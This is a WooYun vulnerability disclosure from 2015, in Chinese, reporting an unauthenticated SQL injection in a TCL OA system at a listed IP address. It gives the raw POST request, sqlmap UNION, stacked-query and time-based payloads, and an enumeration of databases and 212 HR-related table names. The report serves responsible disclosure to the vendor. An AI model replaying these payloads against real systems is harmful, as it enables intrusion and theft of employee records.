当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098588

漏洞标题:TCL某站未授权访问导致SQL注入

相关厂商:TCL官方网上商城

漏洞作者: 深度安全实验室

提交时间:2015-02-28 17:02

修复时间:2015-04-14 17:04

公开时间:2015-04-14 17:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-28: 细节已通知厂商并且等待厂商处理中
2015-02-28: 厂商已经确认,细节仅向厂商公开
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-14: 细节向公众公开

简要描述:

按理说所有的页面都需要登陆才能访问,但是此页面不需要,导致注入。

详细说明:

TCL的OA系统:

http://218.106.133.136/


未授权访问的页面:

http://218.106.133.136/SearchCase/StatusInquiry.aspx

1.jpg

存在SQL注入,出现问题的地方:

POST /WebService/SearchCase.asmx/StatusInquiryInfo HTTP/1.1
Host: 218.106.133.136
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://218.106.133.136/SearchCase/StatusInquiry.aspx
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 109
start=0&limit=10&sort=applydt&dir=DESC&SeachFile=ALL%2CDB%2C2015-02-01%2C2015-02-27%2C%2C%2CA%2CALL%2Cnull%2C

dir参数有问题。

2.JPG


sqlmap identified the following injection points with a total of 120 HTTP(s) requests:
---
Place: POST
Parameter: dir
    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: start=0&limit=10&sort=applydt&dir=DESC) UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(116)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(68)+CHAR(74)+CHAR(106)+CHAR(75)+CHAR(88)+CHAR(69)+CHAR(109)+CHAR(105)+CHAR(99)+CHAR(66)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: start=0&limit=10&sort=applydt&dir=DESC); WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: start=0&limit=10&sort=applydt&dir=DESC) WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: dir
    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: start=0&limit=10&sort=applydt&dir=DESC) UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(116)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(68)+CHAR(74)+CHAR(106)+CHAR(75)+CHAR(88)+CHAR(69)+CHAR(109)+CHAR(105)+CHAR(99)+CHAR(66)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: start=0&limit=10&sort=applydt&dir=DESC); WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: start=0&limit=10&sort=applydt&dir=DESC) WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] distribution
[*] ECS
[*] Hrm
[*] Hrm_OEM
[*] HRM_SZ
[*] master
[*] model
[*] msdb
[*] OutStock
[*] tempdb


Hrm库中212个表:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: dir
    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: start=0&limit=10&sort=applydt&dir=DESC) UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(116)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(68)+CHAR(74)+CHAR(106)+CHAR(75)+CHAR(88)+CHAR(69)+CHAR(109)+CHAR(105)+CHAR(99)+CHAR(66)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: start=0&limit=10&sort=applydt&dir=DESC); WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: start=0&limit=10&sort=applydt&dir=DESC) WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: Hrm
[212 tables]
+--------------------------+
| AUTHORIZATION_TO_PAYMENT |
| Access_AreaMast          |
| Access_AreaPermission    |
| Access_DictDB            |
| Access_DoorDetail        |
| Access_DoorMast          |
| Access_DoorStatus        |
| Access_EntryRecord       |
| Access_EquipmentMast     |
| Access_GroupPermission   |
| Access_OperationRecord   |
| Access_TimeZone          |
| Access_UserPermission    |
| Budge_right_tree         |
| DevCmds                  |
| Devinfo                  |
| DinSysAccount            |
| EC_CJ_TEMP               |
| EC_CONTACTBOOK           |
| EC_LG_COSTWAT            |
| EC_LG_ROOMDETAIL         |
| EC_LG_ROOMMAST           |
| EC_LG_ROOMPERSON         |
| FAPAYMODEL               |
| FAPINGZHENMODEL          |
| FASUBJECT                |
| FaceTmp                  |
| Finance_MainIndex        |
| G4_worktimetable         |
| GSTEMP                   |
| HR_ConBase               |
| HR_DeptToWorkNo          |
| HR_UserGroup             |
| HR_condition             |
| Hr_OutDept               |
| Hr_Position              |
| Hr_Position_Bak          |
| Hr_SelectTemp            |
| Hrm_Freeze               |
| Kq_AllWorkHour           |
| OACITY                   |
| OAPROMARY                |
| OASUPPLIERNO             |
| OA_Account               |
| OA_AccountRight          |
| OA_BC_BudgetCost         |
| OA_BC_FreebackMSG        |
| OA_BC_VariableCost       |
| OA_BC_userright          |
| OA_Car_Booking           |
| OA_Car_Driver            |
| OA_Car_Info              |
| OA_CartNO                |
| OA_CompanyTemp           |
| OA_Controlsub            |
| OA_DocuMentList          |
| OA_EmailRemind           |
| OA_EmailRemindtest       |
| OA_Exam_DB               |
| OA_Exam_ExamMain         |
| OA_Exam_Options          |
| OA_FB_DirtDB             |
| OA_FB_Mainmast           |
| OA_FinanceList           |
| OA_FinancePayMent        |
| OA_GICFinancial          |
| OA_Hr_CommunicationBase  |
| OA_Hr_DictDB             |
| OA_Hr_EducationBase      |
| OA_Hr_EmployeeBase       |
| OA_Hr_EmployeeBaseSed    |
| OA_Hr_FamilyBase         |
| OA_Hr_LaborContract      |
| OA_Hr_LanguageBase       |
| OA_Hr_NationalTitles     |
| OA_Hr_WorkExperience     |
| OA_MES_Board             |
| OA_MainDocuMent          |
| OA_MeetingQuitment       |
| OA_MeetingRoom           |
| OA_Meetingarea           |
| OA_MessTrans             |
| OA_MsgTemp               |
| OA_NextDeptCode          |
| OA_Post                  |
| OA_PostAccount           |
| OA_PrgHeadType           |
| OA_ReplacecardRecord     |
| OA_Role                  |
| OA_SMS                   |
| OA_UserRole              |
| OA_WarehouseAuthorized   |
| OA_base                  |
| OA_companydetail         |
| OA_companymast           |
| OA_companymast_bak       |
| OA_deptleadership        |
| OA_fiveSgr               |
| OA_fiveSmsg              |
| OMS_DocMain              |
| OMS_MeetTable            |
| OMS_Members              |
| Oa_BC_Actualcost         |
| Oa_BC_BUSapcodeTable     |
| Oa_BC_BusinessCodeTable  |
| Oa_BC_ChangeCode         |
| Oa_BC_CodeTable          |
| Oa_BC_Costrate           |
| Oa_BC_FXrate             |
| Oa_BC_SapcodeTable       |
| Oa_BC_SubTable           |
| Oa_Dictionary            |
| Oa_Position              |
| Oa_RightMast             |
| Oa_dept                  |
| Oms_FileList             |
| Oms_ItemDetail           |
| Oms_ItemLog              |
| Oms_ItemMenPer           |
| Oms_ModelDetail          |
| Oms_ModelMain            |
| ProjectBase              |
| ProjectItem              |
| ProjectLog               |
| SyncTemp                 |
| Sys_PrgMast              |
| System_Menu              |
| System_PrgMast           |
| System_Update            |
| System_UserMast          |
| Table_1                  |
| Tmp_10                   |
| Tmp_9                    |
| Tmp_90                   |
| UserInfo                 |
| WF_Delegate              |
| WF_ModelDetail           |
| WF_ModelMast             |
| att_record               |
| budget_upload_excel      |
| deptMesTOHrm             |
| dtproperties             |
| fix_category             |
| fix_dictdb               |
| fix_fixedmast            |
| fix_mark                 |
| fix_mess                 |
| fix_news                 |
| fix_orders               |
| fix_sorts                |
| hr_AddrSFZ               |
| hr_RzEmailInfo           |
| hr_base                  |
| hr_class                 |
| hr_department            |
| hr_dept                  |
| hr_deptcopy              |
| hr_emp_titles            |
| hr_employee              |
| hr_employeeBF            |
| hr_employeeForSAP319     |
| hr_employee_20140707     |
| hr_employee_app          |
| hr_employee_lz           |
| hr_employee_rz           |
| hr_employee_tp           |
| hr_employee_tp_bak       |
| hr_employee_tpback       |
| hr_lzgl                  |
| kq_DoorRecord            |
| kq_LZDate                |
| kq_Machines              |
| kq_SpeOverTimeR          |
| kq_SpeWorkRecord         |
| kq_auto_Machines         |
| kq_base                  |
| kq_cardlist              |
| kq_finger                |
| kq_holiday               |
| kq_leave                 |
| kq_leaveDay              |
| kq_leave_bak             |
| kq_leave_main            |
| kq_leavemonth            |
| kq_machines_emp          |
| kq_machines_log          |
| kq_monthgs               |
| kq_overtime              |
| kq_overtime_bak          |
| kq_transpose             |
| kq_transpose_bak         |
| kq_workday               |
| kq_workday_bak           |
| kq_workday_checkUp       |
| kq_workmonth             |
| kq_workmonth_lz          |
| kq_workrecord            |
| kq_workrecord_bak        |
| kq_worktimetable         |
| oa_TotalMoney            |
| oa_TotalMoneySAP         |
| oa_TotalMoney_Test       |
| oa_accountbak            |
| oa_totalmoney_Copy       |
| oa_totalmoney_bak        |
| sys_user                 |
| sys_userright            |
| sysdiagrams              |
| system_Per               |
| tb_Temp                  |
| temptable                |
| 查询                       |
+--------------------------+


数据内容我就不去看了。。。

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-28 17:09

厂商回复:

感谢您的工作,已转交相关单位处理

最新状态:

暂无